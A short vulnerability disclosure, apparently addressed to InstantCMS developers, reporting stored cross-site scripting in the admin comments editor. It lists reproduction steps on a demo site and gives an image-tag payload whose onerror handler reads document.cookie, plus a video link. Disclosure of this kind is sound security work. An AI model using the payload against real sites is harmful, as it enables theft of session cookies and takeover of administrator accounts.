I noticed that you filtered the comment very carefully.
But there are still some parts you missed
Proof of Concept
1.Login with admin
2.go to “https://demo.instantcms.io/admin/controllers/edit/comments/comments_list”
3.Select 1 comment and insert payload
<image src=1 href=1 onerror="alert(document.cookie)"></image>
4.Click save , and store xss happened
5.Then, login another admin account, go to comments, detect store xss
Video PoC
https://drive.google.com/file/d/12s7byrrIusDs4npsSosusb-WXoPGUrc-/view?usp=drive_link